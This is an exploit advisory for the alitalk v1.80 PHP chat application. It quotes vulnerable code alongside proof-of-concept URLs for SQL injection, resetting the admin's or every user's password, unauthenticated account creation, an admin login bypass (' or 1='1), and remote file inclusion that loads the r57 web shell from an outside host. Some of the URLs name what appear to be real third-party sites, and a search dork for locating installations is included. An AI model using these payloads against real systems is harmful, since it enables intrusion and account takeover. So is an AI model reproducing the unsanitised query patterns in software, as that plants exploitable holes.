| # Title : alitalk v.1.80 Multiple Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : POWERED BY ALITALK
| # Tested on: windows 8.1 Franais V.(Pro)
| # Download : http://teh24h.ir/
=======================================
SQL INJECTION :
you need to login in order to exploit this vulnerability
vulnerable code on inc/receivertwo.php
<?
.....
if($_GET['turnadd']==1)
{
$rmusr=0;
$rmmzyiz=mysql_query("SELECT * from ".$alitalk_base['dbprefix']."users where room='".$_GET['mohit']."'");
while ($rmuiz=mysql_fetch_array($rmmzyiz))
{
echo"<rmusj>";
echo" r%dtr onmouseout=\"detailsclo()\" onmouseover=\"details(event,'".$rmuiz[gender]."','".$rmuiz[age]."','".$rmuiz[username]."','".$rmuiz[location]."')\" ondblclick=\"ums('".$rmuiz[uid]."','".$rmuiz[username]."','".""."')\" b*%d
r%dtd width='19'b*%d r%dimg src=\"pix/room_user.gif\"b*%dr%d/tdb*%d
r%dtd class='roomuser'b*%dr%dfont unselectable='on' style=\"cursor: default;\"b*%d $rmuiz[username] r%d/tdb*%d
r%d/trb*%d";
$rmusr++;
echo"</rmusj>";
}
....
?>
poc:
http://target/path/alitalk/inc/receivertwo.php?uid=1&mohit=y'+union+select+user(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+from+alitalk_users+where+uid='1&turnadd=1&melody=0&lilil=400
PASSWORD CHANGE BYPASS :
vulnerable code on functionz/usercp.php
<?
.....
function newpass($db,$id)
{
$nat=md5($_GET['old'].$_GET['old']);
$nao=md5($_GET['new'].$_GET['new']);
$threeyiz=mysql_query("SELECT * from ".$db."users where uid='".$id."' and password='".md5(md5($_GET['old']).$nat)."'");
$yiz=mysql_fetch_array($threeyiz);
if(!$yiz)
{
echo "Old Password is Wrong!";
}
else
{
mysql_query("UPDATE ".$db."users SET password='".md5(md5($_GET['new']).$nao)."' WHERE uid='".$id."'");
mysql_query("UPDATE ".$db."users SET salt='".$nao."' WHERE uid='".$id."'");
mpl($db,$id);
}
}
.....
?>
pocs:
http://target/path/inc/usercp.php?action=newpass&id=1' or password='&lilil=400&new=algeria
this will change password to "algeria" for user with uid = 1 (admin).
http://target/path/inc/usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=algeria
this will change ALL passwords to "algeria".
http://www.taoa-tanzania.com/chat/alitalk/inc/elementz.php?lilil=400&ubild=indoushka&pa=algeria
USER REGISTRATION BYPASS :
vulnerable code on inc/elementz.php:
<?
......
if($_GET['lilil']!=="".$_SESSION['lilol'].""){return false;}
include"setting.php";
$analuze=mysql_query("SELECT username from ".$alitalk_base['dbprefix']."users where username='".$_GET['ubild']."' and type='alitalk'");
$analuzeed=mysql_fetch_array($analuze);
if($analuzeed)
{
echo "Fatal Error";
}
else
{
$nat=md5($_GET['pa'].$_GET['pa']);
$pass=md5(md5($_GET['pa']).$nat);
mysql_query("INSERT into ".$alitalk_base['dbprefix']."users (firstname,lastname,gender,age,username,password,salt,joindate,addz,type) values('".$_GET['fn']."','".$_GET['ln']."','".$_GET['gender']."','".$_GET['age']."','".$_GET['ubild']."','".$pass."','".$nat."','".date("F j, Y")."','$uid','alitalk')");
....
?>
poc:
http://target/path/inc/elementz.php?lilil=400&ubild=algeria&pa=algeria
this will add an account with username=algeria and password=algeria
Access Bypass :
code on admin/index.php
<?
.......
else if($_POST['signin'])
{
include "../functionz/first_process.php";
include "../inc/setting.php";
addin($_POST['username'],$_POST['password'],$alitalk_base['dbprefix']);
}
.....
?>
vulnerable code on functionz/first_process.php
<?
......
function addin($lamerz,$killer,$josh)
{
session_start();
$nat=md5($killer.$killer);
$analuze=mysql_query("SELECT * FROM ".$josh."info WHERE admin='".$lamerz."' AND password='".md5(md5($killer).$nat)."'");
$analuzeed=mysql_fetch_array($analuze);
if($analuzeed)
{
$_SESSION['adazsar']=1;
?>
admin login page= http://target/path/admin
poc:
ID = an_userID' or 1='1
password = whatever
L/R file inclusion :
C:\web\www\alitalk\inc\elementd.php
require_once('lang/'.$alitalk['lang'].'/menu.php');
Line : 31
Function : require_once
Variables : $alitalk['lang']
poc :
http://www.nickerie.net/chat/inc/elementd.php?alitalk[lang]=http://www.dcvi.net/r57.txt
Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------